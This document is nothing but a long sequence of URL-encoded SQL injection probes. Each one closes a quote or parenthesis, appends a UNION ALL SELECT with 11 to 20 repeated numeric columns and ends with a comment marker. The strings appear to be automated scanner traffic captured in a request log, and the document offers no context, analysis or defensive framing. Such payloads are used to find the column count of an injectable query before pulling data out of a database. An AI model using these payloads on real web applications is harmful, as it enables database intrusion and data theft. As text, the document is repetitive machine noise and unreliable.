-2570%29%20UNION%20ALL%20SELECT%202785%2C2785%2C2785%2C2785%2C2785%2C2785%2C2785%2C2785%2C2785%2C2785%2C2785%2C2785%2C2785%2C2785%2C2785%2C2785%2C2785%23 -1314%29%20UNION%20ALL%20SELECT%208267%2C8267%2C8267%2C8267%2C8267%2C8267%2C8267%2C8267%2C8267%2C8267%2C8267%2C8267%2C8267%2C8267%2C8267%2C8267%2C8267%2C8267%23 -3390%29%20UNION%20ALL%20SELECT%207552%2C7552%2C7552%2C7552%2C7552%2C7552%2C7552%2C7552%2C7552%2C7552%2C7552%2C7552%2C7552%2C7552%2C7552%2C7552%2C7552%2C7552%2C7552%23 -5898%29%20UNION%20ALL%20SELECT%204198%2C4198%2C4198%2C4198%2C4198%2C4198%2C4198%2C4198%2C4198%2C4198%2C4198%2C4198%2C4198%2C4198%2C4198%2C4198%2C4198%2C4198%2C4198%2C4198%23 -3743%29%29%20UNION%20ALL%20SELECT%206621%2C6621%2C6621%2C6621%2C6621%2C6621%2C6621%2C6621%2C6621%2C6621%2C6621%23 -7287%29%29%20UNION%20ALL%20SELECT%203041%2C3041%2C3041%2C3041%2C3041%2C3041%2C3041%2C3041%2C3041%2C3041%2C3041%2C3041%23 -8553%29%29%20UNION%20ALL%20SELECT%201819%2C1819%2C1819%2C1819%2C1819%2C1819%2C1819%2C1819%2C1819%2C1819%2C1819%2C1819%2C1819%23 -4395%29%29%20UNION%20ALL%20SELECT%207042%2C7042%2C7042%2C7042%2C7042%2C7042%2C7042%2C7042%2C7042%2C7042%2C7042%2C7042%2C7042%2C7042%23 -2784%29%29%20UNION%20ALL%20SELECT%205867%2C5867%2C5867%2C5867%2C5867%2C5867%2C5867%2C5867%2C5867%2C5867%2C5867%2C5867%2C5867%2C5867%2C5867%23 -6634%29%29%20UNION%20ALL%20SELECT%202005%2C2005%2C2005%2C2005%2C2005%2C2005%2C2005%2C2005%2C2005%2C2005%2C2005%2C2005%2C2005%2C2005%2C2005%2C2005%23 -8153%29%29%20UNION%20ALL%20SELECT%203130%2C3130%2C3130%2C3130%2C3130%2C3130%2C3130%2C3130%2C3130%2C3130%2C3130%2C3130%2C3130%2C3130%2C3130%2C3130%2C3130%23 -6409%29%29%20UNION%20ALL%20SELECT%204876%2C4876%2C4876%2C4876%2C4876%2C4876%2C4876%2C4876%2C4876%2C4876%2C4876%2C4876%2C4876%2C4876%2C4876%2C4876%2C4876%2C4876%23 -7112%29%29%20UNION%20ALL%20SELECT%203721%2C3721%2C3721%2C3721%2C3721%2C3721%2C3721%2C3721%2C3721%2C3721%2C3721%2C3721%2C3721%2C3721%2C3721%2C3721%2C3721%2C3721%2C3721%23 -2280%29%29%20UNION%20ALL%20SELECT%201032%2C1032%2C1032%2C1032%2C1032%2C1032%2C1032%2C1032%2C1032%2C1032%2C1032%2C1032%2C1032%2C1032%2C1032%2C1032%2C1032%2C1032%2C1032%2C1032%23 -8868%29%29%29%20UNION%20ALL%20SELECT%209475%2C9475%2C9475%2C9475%2C9475%2C9475%2C9475%2C9475%2C9475%2C9475%2C9475%23 -8556%29%29%29%20UNION%20ALL%20SELECT%203709%2C3709%2C3709%2C3709%2C3709%2C3709%2C3709%2C3709%2C3709%2C3709%2C3709%2C3709%23 -1405%29%29%29%20UNION%20ALL%20SELECT%209545%2C9545%2C9545%2C9545%2C9545%2C9545%2C9545%2C9545%2C9545%2C9545%2C9545%2C9545%2C9545%23 -4265%29%29%29%20UNION%20ALL%20SELECT%202097%2C2097%2C2097%2C2097%2C2097%2C2097%2C2097%2C2097%2C2097%2C2097%2C2097%2C2097%2C2097%2C2097%23 -9047%29%29%29%20UNION%20ALL%20SELECT%206114%2C6114%2C6114%2C6114%2C6114%2C6114%2C6114%2C6114%2C6114%2C6114%2C6114%2C6114%2C6114%2C6114%2C6114%23 -7374%29%29%29%20UNION%20ALL%20SELECT%202091%2C2091%2C2091%2C2091%2C2091%2C2091%2C2091%2C2091%2C2091%2C2091%2C2091%2C2091%2C2091%2C2091%2C2091%2C2091%23 -2010%29%29%29%20UNION%20ALL%20SELECT%204270%2C4270%2C4270%2C4270%2C4270%2C4270%2C4270%2C4270%2C4270%2C4270%2C4270%2C4270%2C4270%2C4270%2C4270%2C4270%2C4270%23 -6990%29%29%29%20UNION%20ALL%20SELECT%206408%2C6408%2C6408%2C6408%2C6408%2C6408%2C6408%2C6408%2C6408%2C6408%2C6408%2C6408%2C6408%2C6408%2C6408%2C6408%2C6408%2C6408%23 -2181%29%29%29%20UNION%20ALL%20SELECT%205710%2C5710%2C5710%2C5710%2C5710%2C5710%2C5710%2C5710%2C5710%2C5710%2C5710%2C5710%2C5710%2C5710%2C5710%2C5710%2C5710%2C5710%2C5710%23 -5442%29%29%29%20UNION%20ALL%20SELECT%202770%2C2770%2C2770%2C2770%2C2770%2C2770%2C2770%2C2770%2C2770%2C2770%2C2770%2C2770%2C2770%2C2770%2C2770%2C2770%2C2770%2C2770%2C2770%2C2770%23 -9261%20UNION%20ALL%20SELECT%209043%2C9043%2C9043%2C9043%2C9043%2C9043%2C9043%2C9043%2C9043%2C9043%2C9043%23 -2995%20UNION%20ALL%20SELECT%201590%2C1590%2C1590%2C1590%2C1590%2C1590%2C1590%2C1590%2C1590%2C1590%2C1590%2C1590%23 -3742%20UNION%20ALL%20SELECT%206338%2C6338%2C6338%2C6338%2C6338%2C6338%2C6338%2C6338%2C6338%2C6338%2C6338%2C6338%2C6338%23 -1479%20UNION%20ALL%20SELECT%204520%2C4520%2C4520%2C4520%2C4520%2C4520%2C4520%2C4520%2C4520%2C4520%2C4520%2C4520%2C4520%2C4520%23 -8870%20UNION%20ALL%20SELECT%205993%2C5993%2C5993%2C5993%2C5993%2C5993%2C5993%2C5993%2C5993%2C5993%2C5993%2C5993%2C5993%2C5993%2C5993%23 -1435%20UNION%20ALL%20SELECT%206698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%23 -2705%20UNION%20ALL%20SELECT%203458%2C3458%2C3458%2C3458%2C3458%2C3458%2C3458%2C3458%2C3458%2C3458%2C3458%2C3458%2C3458%2C3458%2C3458%2C3458%2C3458%23 -6694%20UNION%20ALL%20SELECT%202208%2C2208%2C2208%2C2208%2C2208%2C2208%2C2208%2C2208%2C2208%2C2208%2C2208%2C2208%2C2208%2C2208%2C2208%2C2208%2C2208%2C2208%23 -7183%20UNION%20ALL%20SELECT%204641%2C4641%2C4641%2C4641%2C4641%2C4641%2C4641%2C4641%2C4641%2C4641%2C4641%2C4641%2C4641%2C4641%2C4641%2C4641%2C4641%2C4641%2C4641%23 -3333%20UNION%20ALL%20SELECT%208202%2C8202%2C8202%2C8202%2C8202%2C8202%2C8202%2C8202%2C8202%2C8202%2C8202%2C8202%2C8202%2C8202%2C8202%2C8202%2C8202%2C8202%2C8202%2C8202%23 -2228%27%29%20UNION%20ALL%20SELECT%203421%2C3421%2C3421%2C3421%2C3421%2C3421%2C3421%2C3421%2C3421%2C3421%2C3421%23 -9679%27%29%20UNION%20ALL%20SELECT%204854%2C4854%2C4854%2C4854%2C4854%2C4854%2C4854%2C4854%2C4854%2C4854%2C4854%2C4854%23 -3109%27%29%20UNION%20ALL%20SELECT%208738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%23 -1921%27%29%20UNION%20ALL%20SELECT%207668%2C7668%2C7668%2C7668%2C7668%2C7668%2C7668%2C7668%2C7668%2C7668%2C7668%2C7668%2C7668%2C7668%23 -6101%27%29%20UNION%20ALL%20SELECT%203771%2C3771%2C3771%2C3771%2C3771%2C3771%2C3771%2C3771%2C3771%2C3771%2C3771%2C3771%2C3771%2C3771%2C3771%23 -3899%27%29%20UNION%20ALL%20SELECT%201052%2C1052%2C1052%2C1052%2C1052%2C1052%2C1052%2C1052%2C1052%2C1052%2C1052%2C1052%2C1052%2C1052%2C1052%2C1052%23 -2841%27%29%20UNION%20ALL%20SELECT%204718%2C4718%2C4718%2C4718%2C4718%2C4718%2C4718%2C4718%2C4718%2C4718%2C4718%2C4718%2C4718%2C4718%2C4718%2C4718%2C4718%23 -6963%27%29%20UNION%20ALL%20SELECT%201241%2C1241%2C1241%2C1241%2C1241%2C1241%2C1241%2C1241%2C1241%2C1241%2C1241%2C1241%2C1241%2C1241%2C1241%2C1241%2C1241%2C1241%23 -2136%27%29%20UNION%20ALL%20SELECT%202717%2C2717%2C2717%2C2717%2C2717%2C2717%2C2717%2C2717%2C2717%2C2717%2C2717%2C2717%2C2717%2C2717%2C2717%2C2717%2C2717%2C2717%2C2717%23 -5890%27%29%20UNION%20ALL%20SELECT%204593%2C4593%2C4593%2C4593%2C4593%2C4593%2C4593%2C4593%2C4593%2C4593%2C4593%2C4593%2C4593%2C4593%2C4593%2C4593%2C4593%2C4593%2C4593%2C4593%23 -4925%27%29%29%20UNION%20ALL%20SELECT%205607%2C5607%2C5607%2C5607%2C5607%2C5607%2C5607%2C5607%2C5607%2C5607%2C5607%23 -3452%27%29%29%20UNION%20ALL%20SELECT%204580%2C4580%2C4580%2C4580%2C4580%2C4580%2C4580%2C4580%2C4580%2C4580%2C4580%2C4580%23 -9415%27%29%29%20UNION%20ALL%20SELECT%207046%2C7046%2C7046%2C7046%2C7046%2C7046%2C7046%2C7046%2C7046%2C7046%2C7046%2C7046%2C7046%23 -8360%27%29%29%20UNION%20ALL%20SELECT%201340%2C1340%2C1340%2C1340%2C1340%2C1340%2C1340%2C1340%2C1340%2C1340%2C1340%2C1340%2C1340%2C1340%23 -6235%27%29%29%20UNION%20ALL%20SELECT%203861%2C3861%2C3861%2C3861%2C3861%2C3861%2C3861%2C3861%2C3861%2C3861%2C3861%2C3861%2C3861%2C3861%2C3861%23 -8913%27%29%29%20UNION%20ALL%20SELECT%206993%2C6993%2C6993%2C6993%2C6993%2C6993%2C6993%2C6993%2C6993%2C6993%2C6993%2C6993%2C6993%2C6993%2C6993%2C6993%23 -3793%27%29%29%20UNION%20ALL%20SELECT%205872%2C5872%2C5872%2C5872%2C5872%2C5872%2C5872%2C5872%2C5872%2C5872%2C5872%2C5872%2C5872%2C5872%2C5872%2C5872%2C5872%23 -4159%27%29%29%20UNION%20ALL%20SELECT%208008%2C8008%2C8008%2C8008%2C8008%2C8008%2C8008%2C8008%2C8008%2C8008%2C8008%2C8008%2C8008%2C8008%2C8008%2C8008%2C8008%2C8008%23 -4057%27%29%29%20UNION%20ALL%20SELECT%208754%2C8754%2C8754%2C8754%2C8754%2C8754%2C8754%2C8754%2C8754%2C8754%2C8754%2C8754%2C8754%2C8754%2C8754%2C8754%2C8754%2C8754%2C8754%23 -5656%27%29%29%20UNION%20ALL%20SELECT%203377%2C3377%2C3377%2C3377%2C3377%2C3377%2C3377%2C3377%2C3377%2C3377%2C3377%2C3377%2C3377%2C3377%2C3377%2C3377%2C3377%2C3377%2C3377%2C3377%23 -2377%27%29%29%29%20UNION%20ALL%20SELECT%201694%2C1694%2C1694%2C1694%2C1694%2C1694%2C1694%2C1694%2C1694%2C1694%2C1694%23 -9509%27%29%29%29%20UNION%20ALL%20SELECT%203945%2C3945%2C3945%2C3945%2C3945%2C3945%2C3945%2C3945%2C3945%2C3945%2C3945%2C3945%23 -1501%27%29%29%29%20UNION%20ALL%20SELECT%201660%2C1660%2C1660%2C1660%2C1660%2C1660%2C1660%2C1660%2C1660%2C1660%2C1660%2C1660%2C1660%23 -3955%27%29%29%29%20UNION%20ALL%20SELECT%204609%2C4609%2C4609%2C4609%2C4609%2C4609%2C4609%2C4609%2C4609%2C4609%2C4609%2C4609%2C4609%2C4609%23 -1443%27%29%29%29%20UNION%20ALL%20SELECT%202595%2C2595%2C2595%2C2595%2C2595%2C2595%2C2595%2C2595%2C2595%2C2595%2C2595%2C2595%2C2595%2C2595%2C2595%23 -1477%27%29%29%29%20UNION%20ALL%20SELECT%206519%2C6519%2C6519%2C6519%2C6519%2C6519%2C6519%2C6519%2C6519%2C6519%2C6519%2C6519%2C6519%2C6519%2C6519%2C6519%23 -7210%27%29%29%29%20UNION%20ALL%20SELECT%205408%2C5408%2C5408%2C5408%2C5408%2C5408%2C5408%2C5408%2C5408%2C5408%2C5408%2C5408%2C5408%2C5408%2C5408%2C5408%2C5408%23 -2204%27%29%29%29%20UNION%20ALL%20SELECT%205492%2C5492%2C5492%2C5492%2C5492%2C5492%2C5492%2C5492%2C5492%2C5492%2C5492%2C5492%2C5492%2C5492%2C5492%2C5492%2C5492%2C5492%23 -9706%27%29%29%29%20UNION%20ALL%20SELECT%203322%2C3322%2C3322%2C3322%2C3322%2C3322%2C3322%2C3322%2C3322%2C3322%2C3322%2C3322%2C3322%2C3322%2C3322%2C3322%2C3322%2C3322%2C3322%23 -1579%27%29%29%29%20UNION%20ALL%20SELECT%202594%2C2594%2C2594%2C2594%2C2594%2C2594%2C2594%2C2594%2C2594%2C2594%2C2594%2C2594%2C2594%2C2594%2C2594%2C2594%2C2594%2C2594%2C2594%2C2594%23 -7918%27%20UNION%20ALL%20SELECT%208979%2C8979%2C8979%2C8979%2C8979%2C8979%2C8979%2C8979%2C8979%2C8979%2C8979%23 -4619%27%20UNION%20ALL%20SELECT%209586%2C9586%2C9586%2C9586%2C9586%2C9586%2C9586%2C9586%2C9586%2C9586%2C9586%2C9586%23 -5966%27%20UNION%20ALL%20SELECT%208552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%23 -4406%27%20UNION%20ALL%20SELECT%202970%2C2970%2C2970%2C2970%2C2970%2C2970%2C2970%2C2970%2C2970%2C2970%2C2970%2C2970%2C2970%2C2970%23 -8049%27%20UNION%20ALL%20SELECT%203854%2C3854%2C3854%2C3854%2C3854%2C3854%2C3854%2C3854%2C3854%2C3854%2C3854%2C3854%2C3854%2C3854%2C3854%23 -9428%27%20UNION%20ALL%20SELECT%208701%2C8701%2C8701%2C8701%2C8701%2C8701%2C8701%2C8701%2C8701%2C8701%2C8701%2C8701%2C8701%2C8701%2C8701%2C8701%23 -2471%27%20UNION%20ALL%20SELECT%203852%2C3852%2C3852%2C3852%2C3852%2C3852%2C3852%2C3852%2C3852%2C3852%2C3852%2C3852%2C3852%2C3852%2C3852%2C3852%2C3852%23 -3738%27%20UNION%20ALL%20SELECT%206927%2C6927%2C6927%2C6927%2C6927%2C6927%2C6927%2C6927%2C6927%2C6927%2C6927%2C6927%2C6927%2C6927%2C6927%2C6927%2C6927%2C6927%23 -8074%27%20UNION%20ALL%20SELECT%203811%2C3811%2C3811%2C3811%2C3811%2C3811%2C3811%2C3811%2C3811%2C3811%2C3811%2C3811%2C3811%2C3811%2C3811%2C3811%2C3811%2C3811%2C3811%23 -8531%27%20UNION%20ALL%20SELECT%201768%2C1768%2C1768%2C1768%2C1768%2C1768%2C1768%2C1768%2C1768%2C1768%2C1768%2C1768%2C1768%2C1768%2C1768%2C1768%2C1768%2C1768%2C1768%2C1768%23 -6289%27%29%20UNION%20ALL%20SELECT%206035%2C6035%2C6035%2C6035%2C6035%2C6035%2C6035%2C6035%2C6035%2C6035%2C6035%23 -2039%27%29%20UNION%20ALL%20SELECT%206574%2C6574%2C6574%2C6574%2C6574%2C6574%2C6574%2C6574%2C6574%2C6574%2C6574%2C6574%23 -5841%27%29%20UNION%20ALL%20SELECT%207108%2C7108%2C7108%2C7108%2C7108%2C7108%2C7108%2C7108%2C7108%2C7108%2C7108%2C7108%2C7108%23 -2537%27%29%20UNION%20ALL%20SELECT%202553%2C2553%2C2553%2C2553%2C2553%2C2553%2C2553%2C2553%2C2553%2C2553%2C2553%2C2553%2C2553%2C2553%23 -2148%27%29%20UNION%20ALL%20SELECT%205984%2C5984%2C5984%2C5984%2C5984%2C5984%2C5984%2C5984%2C5984%2C5984%2C5984%2C5984%2C5984%2C5984%2C5984%23 -2694%27%29%20UNION%20ALL%20SELECT%202500%2C2500%2C2500%2C2500%2C2500%2C2500%2C2500%2C2500%2C2500%2C2500%2C2500%2C2500%2C2500%2C2500%2C2500%2C2500%23 -7752%27%29%20UNION%20ALL%20SELECT%205183%2C5183%2C5183%2C5183%2C5183%2C5183%2C5183%2C5183%2C5183%2C5183%2C5183%2C5183%2C5183%2C5183%2C5183%2C5183%2C5183%23 -8063%27%29%20UNION%20ALL%20SELECT%204398%2C4398%2C4398%2C4398%2C4398%2C4398%2C4398%2C4398%2C4398%2C4398%2C4398%2C4398%2C4398%2C4398%2C4398%2C4398%2C4398%2C4398%23 -9859%27%29%20UNION%20ALL%20SELECT%204096%2C4096%2C4096%2C4096%2C4096%2C4096%2C4096%2C4096%2C4096%2C4096%2C4096%2C4096%2C4096%2C4096%2C4096%2C4096%2C4096%2C4096%2C4096%23 -7866%27%29%20UNION%20ALL%20SELECT%201172%2C1172%2C1172%2C1172%2C1172%2C1172%2C1172%2C1172%2C1172%2C1172%2C1172%2C1172%2C1172%2C1172%2C1172%2C1172%2C1172%2C1172%2C1172%2C1172%23 -3668%27%29%29%20UNION%20ALL%20SELECT%201804%2C1804%2C1804%2C1804%2C1804%2C1804%2C1804%2C1804%2C1804%2C1804%2C1804%23 -3414%27%29%29%20UNION%20ALL%20SELECT%206892%2C6892%2C6892%2C6892%2C6892%2C6892%2C6892%2C6892%2C6892%2C6892%2C6892%2C6892%23 -6635%27%29%29%20UNION%20ALL%20SELECT%205081%2C5081%2C5081%2C5081%2C5081%2C5081%2C5081%2C5081%2C5081%2C5081%2C5081%2C5081%2C5081%23 -2871%27%29%29%20UNION%20ALL%20SELECT%202828%2C2828%2C2828%2C2828%2C2828%2C2828%2C2828%2C2828%2C2828%2C2828%2C2828%2C2828%2C2828%2C2828%23 -3072%27%29%29%20UNION%20ALL%20SELECT%206730%2C6730%2C6730%2C6730%2C6730%2C6730%2C6730%2C6730%2C6730%2C6730%2C6730%2C6730%2C6730%2C6730%2C6730%23 -6382%27%29%29%20UNION%20ALL%20SELECT%203398%2C3398%2C3398%2C3398%2C3398%2C3398%2C3398%2C3398%2C3398%2C3398%2C3398%2C3398%2C3398%2C3398%2C3398%2C3398%23 -2202%27%29%29%20UNION%20ALL%20SELECT%206707%2C6707%2C6707%2C6707%2C6707%2C6707%2C6707%2C6707%2C6707%2C6707%2C6707%2C6707%2C6707%2C6707%2C6707%2C6707%2C6707%23 -1195%27%29%29%20UNION%20ALL%20SELECT%206625%2C6625%2C6625%2C6625%2C6625%2C6625%2C6625%2C6625%2C6625%2C6625%2C6625%2C6625%2C6625%2C6625%2C6625%2C6625%2C6625%2C6625%23 -2989%27%29%29%20UNION%20ALL%20SELECT%202604%2C2604%2C2604%2C2604%2C2604%2C2604%2C2604%2C2604%2C2604%2C2604%2C2604%2C2604%2C2604%2C2604%2C2604%2C2604%2C2604%2C2604%2C2604%23 -6273%27%29%29%20UNION%20ALL%20SELECT%201879%2C1879%2C1879%2C1879%2C1879%2C1879%2C1879%2C1879%2C1879%2C1879%2C1879%2C1879%2C1879%2C1879%2C1879%2C1879%2C1879%2C1879%2C1879%2C1879%23 -5459%27%29%29%29%20UNION%20ALL%20SELECT%208895%2C8895%2C8895%2C8895%2C8895%2C8895%2C8895%2C8895%2C8895%2C8895%2C8895%23 -6648%27%29%29%29%20UNION%20ALL%20SELECT%208383%2C8383%2C8383%2C8383%2C8383%2C8383%2C8383%2C8383%2C8383%2C8383%2C8383%2C8383%23 -6601%27%29%29%29%20UNION%20ALL%20SELECT%201086%2C1086%2C1086%2C1086%2C1086%2C1086%2C1086%2C1086%2C1086%2C1086%2C1086%2C1086%2C1086%23 -6818%27%29%29%29%20UNION%20ALL%20SELECT%209439%2C9439%2C9439%2C9439%2C9439%2C9439%2C9439%2C9439%2C9439%2C9439%2C9439%2C9439%2C9439%2C9439%23 -5813%27%29%29%29%20UNION%20ALL%20SELECT%202882%2C2882%2C2882%2C2882%2C2882%2C2882%2C2882%2C2882%2C2882%2C2882%2C2882%2C2882%2C2882%2C2882%2C2882%23 -1579%27%29%29%29%20UNION%20ALL%20SELECT%206987%2C6987%2C6987%2C6987%2C6987%2C6987%2C6987%2C6987%2C6987%2C6987%2C6987%2C6987%2C6987%2C6987%2C6987%2C6987%23 -1500%27%29%29%29%20UNION%20ALL%20SELECT%203627%2C3627%2C3627%2C3627%2C3627%2C3627%2C3627%2C3627%2C3627%2C3627%2C3627%2C3627%2C3627%2C3627%2C3627%2C3627%2C3627%23 -1573%27%29%29%29%20UNION%20ALL%20SELECT%202021%2C2021%2C2021%2C2021%2C2021%2C2021%2C2021%2C2021%2C2021%2C2021%2C2021%2C2021%2C2021%2C2021%2C2021%2C2021%2C2021%2C2021%23 -5592%27%29%29%29%20UNION%20ALL%20SELECT%206617%2C6617%2C6617%2C6617%2C6617%2C6617%2C6617%2C6617%2C6617%2C6617%2C6617%2C6617%2C6617%2C6617%2C6617%2C6617%2C6617%2C6617%2C6617%23 -4191%27%29%29%29%20UNION%20ALL%20SELECT%207994%2C7994%2C7994%2C7994%2C7994%2C7994%2C7994%2C7994%2C7994%2C7994%2C7994%2C7994%2C7994%2C7994%2C7994%2C7994%2C7994%2C7994%2C7994%2C7994%23 -4258%27%20UNION%20ALL%20SELECT%201198%2C1198%2C1198%2C1198%2C1198%2C1198%2C1198%2C1198%2C1198%2C1198%2C1198%23 -3714%27%20UNION%20ALL%20SELECT%202422%2C2422%2C2422%2C2422%2C2422%2C2422%2C2422%2C2422%2C2422%2C2422%2C2422%2C2422%23 -2292%27%20UNION%20ALL%20SELECT%202928%2C2928%2C2928%2C2928%2C2928%2C2928%2C2928%2C2928%2C2928%2C2928%2C2928%2C2928%2C2928%23 -9457%27%20UNION%20ALL%20SELECT%205063%2C5063%2C5063%2C5063%2C5063%2C5063%2C5063%2C5063%2C5063%2C5063%2C5063%2C5063%2C5063%2C5063%23 -7654%27%20UNION%20ALL%20SELECT%204892%2C4892%2C4892%2C4892%2C4892%2C4892%2C4892%2C4892%2C4892%2C4892%2C4892%2C4892%2C4892%2C4892%2C4892%23 -9618%27%20UNION%20ALL%20SELECT%206200%2C6200%2C6200%2C6200%2C6200%2C6200%2C6200%2C6200%2C6200%2C6200%2C6200%2C6200%2C6200%2C6200%2C6200%2C6200%23 -8514%27%20UNION%20ALL%20SELECT%209435%2C9435%2C9435%2C9435%2C9435%2C9435%2C9435%2C9435%2C9435%2C9435%2C9435%2C9435%2C9435%2C9435%2C9435%2C9435%2C9435%23 -9320%27%20UNION%20ALL%20SELECT%209506%2C9506%2C9506%2C9506%2C9506%2C9506%2C9506%2C9506%2C9506%2C9506%2C9506%2C9506%2C9506%2C9506%2C9506%2C9506%2C9506%2C9506%23 -2538%27%20UNION%20ALL%20SELECT%207783%2C7783%2C7783%2C7783%2C7783%2C7783%2C7783%2C7783%2C7783%2C7783%2C7783%2C7783%2C7783%2C7783%2C7783%2C7783%2C7783%2C7783%2C7783%23 -6917%27%20UNION%20ALL%20SELECT%208331%2C8331%2C8331%2C8331%2C8331%2C8331%2C8331%2C8331%2C8331%2C8331%2C8331%2C8331%2C8331%2C8331%2C8331%2C8331%2C8331%2C8331%2C8331%2C8331%23 -7387%22%29%20UNION%20ALL%20SELECT%201449%2C1449%2C1449%2C1449%2C1449%2C1449%2C1449%2C1449%2C1449%2C1449%2C1449%23 -7629%22%29%20UNION%20ALL%20SELECT%207692%2C7692%2C7692%2C7692%2C7692%2C7692%2C7692%2C7692%2C7692%2C7692%2C7692%2C7692%23 -9099%22%29%20UNION%20ALL%20SELECT%204815%2C4815%2C4815%2C4815%2C4815%2C4815%2C4815%2C4815%2C4815%2C4815%2C4815%2C4815%2C4815%23 -1947%22%29%20UNION%20ALL%20SELECT%206804%2C6804%2C6804%2C6804%2C6804%2C6804%2C6804%2C6804%2C6804%2C6804%2C6804%2C6804%2C6804%2C6804%23 -5908%22%29%20UNION%20ALL%20SELECT%206515%2C6515%2C6515%2C6515%2C6515%2C6515%2C6515%2C6515%2C6515%2C6515%2C6515%2C6515%2C6515%2C6515%2C6515%23 -8990%22%29%20UNION%20ALL%20SELECT%204441%2C4441%2C4441%2C4441%2C4441%2C4441%2C4441%2C4441%2C4441%2C4441%2C4441%2C4441%2C4441%2C4441%2C4441%2C4441%23 -2358%22%29%20UNION%20ALL%20SELECT%207590%2C7590%2C7590%2C7590%2C7590%2C7590%2C7590%2C7590%2C7590%2C7590%2C7590%2C7590%2C7590%2C7590%2C7590%2C7590%2C7590%23 -8829%22%29%20UNION%20ALL%20SELECT%207398%2C7398%2C7398%2C7398%2C7398%2C7398%2C7398%2C7398%2C7398%2C7398%2C7398%2C7398%2C7398%2C7398%2C7398%2C7398%2C7398%2C7398%23 -2852%22%29%20UNION%20ALL%20SELECT%209606%2C9606%2C9606%2C9606%2C9606%2C9606%2C9606%2C9606%2C9606%2C9606%2C9606%2C9606%2C9606%2C9606%2C9606%2C9606%2C9606%2C9606%2C9606%23 -8601%22%29%20UNION%20ALL%20SELECT%204774%2C4774%2C4774%2C4774%2C4774%2C4774%2C4774%2C4774%2C4774%2C4774%2C4774%2C4774%2C4774%2C4774%2C4774%2C4774%2C4774%2C4774%2C4774%2C4774%23 -6770%22%29%29%20UNION%20ALL%20SELECT%206794%2C6794%2C6794%2C6794%2C6794%2C6794%2C6794%2C6794%2C6794%2C6794%2C6794%23 -6052%22%29%29%20UNION%20ALL%20SELECT%207038%2C7038%2C7038%2C7038%2C7038%2C7038%2C7038%2C7038%2C7038%2C7038%2C7038%2C7038%23 -7970%22%29%29%20UNION%20ALL%20SELECT%206146%2C6146%2C6146%2C6146%2C6146%2C6146%2C6146%2C6146%2C6146%2C6146%2C6146%2C6146%2C6146%23 -8242%22%29%29%20UNION%20ALL%20SELECT%208670%2C8670%2C8670%2C8670%2C8670%2C8670%2C8670%2C8670%2C8670%2C8670%2C8670%2C8670%2C8670%2C8670%23 -2243%22%29%29%20UNION%20ALL%20SELECT%203443%2C3443%2C3443%2C3443%2C3443%2C3443%2C3443%2C3443%2C3443%2C3443%2C3443%2C3443%2C3443%2C3443%2C3443%23 -7962%22%29%29%20UNION%20ALL%20SELECT%203487%2C3487%2C3487%2C3487%2C3487%2C3487%2C3487%2C3487%2C3487%2C3487%2C3487%2C3487%2C3487%2C3487%2C3487%2C3487%23 -2089%22%29%29%20UNION%20ALL%20SELECT%201074%2C1074%2C1074%2C1074%2C1074%2C1074%2C1074%2C1074%2C1074%2C1074%2C1074%2C1074%2C1074%2C1074%2C1074%2C1074%2C1074%23 -6314%22%29%29%20UNION%20ALL%20SELECT%201510%2C1510%2C1510%2C1510%2C1510%2C1510%2C1510%2C1510%2C1510%2C1510%2C1510%2C1510%2C1510%2C1510%2C1510%2C1510%2C1510%2C1510%23 -4778%22%29%29%20UNION%20ALL%20SELECT%205842%2C5842%2C5842%2C5842%2C5842%2C5842%2C5842%2C5842%2C5842%2C5842%2C5842%2C5842%2C5842%2C5842%2C5842%2C5842%2C5842%2C5842%2C5842%23 -1099%22%29%29%20UNION%20ALL%20SELECT%205711%2C5711%2C5711%2C5711%2C5711%2C5711%2C5711%2C5711%2C5711%2C5711%2C5711%2C5711%2C5711%2C5711%2C5711%2C5711%2C5711%2C5711%2C5711%2C5711%23 -3836%22%29%29%29%20UNION%20ALL%20SELECT%202742%2C2742%2C2742%2C2742%2C2742%2C2742%2C2742%2C2742%2C2742%2C2742%2C2742%23 -3807%22%29%29%29%20UNION%20ALL%20SELECT%201476%2C1476%2C1476%2C1476%2C1476%2C1476%2C1476%2C1476%2C1476%2C1476%2C1476%2C1476%23 -8094%22%29%29%29%20UNION%20ALL%20SELECT%208538%2C8538%2C8538%2C8538%2C8538%2C8538%2C8538%2C8538%2C8538%2C8538%2C8538%2C8538%2C8538%23 -3271%22%29%29%29%20UNION%20ALL%20SELECT%206426%2C6426%2C6426%2C6426%2C6426%2C6426%2C6426%2C6426%2C6426%2C6426%2C6426%2C6426%2C6426%2C6426%23 -5909%22%29%29%29%20UNION%20ALL%20SELECT%208480%2C8480%2C8480%2C8480%2C8480%2C8480%2C8480%2C8480%2C8480%2C8480%2C8480%2C8480%2C8480%2C8480%2C8480%23 -4655%22%29%29%29%20UNION%20ALL%20SELECT%208909%2C8909%2C8909%2C8909%2C8909%2C8909%2C8909%2C8909%2C8909%2C8909%2C8909%2C8909%2C8909%2C8909%2C8909%2C8909%23 -1526%22%29%29%29%20UNION%20ALL%20SELECT%208023%2C8023%2C8023%2C8023%2C8023%2C8023%2C8023%2C8023%2C8023%2C8023%2C8023%2C8023%2C8023%2C8023%2C8023%2C8023%2C8023%23 -5009%22%29%29%29%20UNION%20ALL%20SELECT%205615%2C5615%2C5615%2C5615%2C5615%2C5615%2C5615%2C5615%2C5615%2C5615%2C5615%2C5615%2C5615%2C5615%2C5615%2C5615%2C5615%2C5615%23 -8164%22%29%29%29%20UNION%20ALL%20SELECT%209223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%23 -8568%22%29%29%29%20UNION%20ALL%20SELECT%202282%2C2282%2C2282%2C2282%2C2282%2C2282%2C2282%2C2282%2C2282%2C2282%2C2282%2C2282%2C2282%2C2282%2C2282%2C2282%2C2282%2C2282%2C2282%2C2282%23 -5525%22%20UNION%20ALL%20SELECT%205016%2C5016%2C5016%2C5016%2C5016%2C5016%2C5016%2C5016%2C5016%2C5016%2C5016%23 -4182%22%20UNION%20ALL%20SELECT%207016%2C7016%2C7016%2C7016%2C7016%2C7016%2C7016%2C7016%2C7016%2C7016%2C7016%2C7016%23 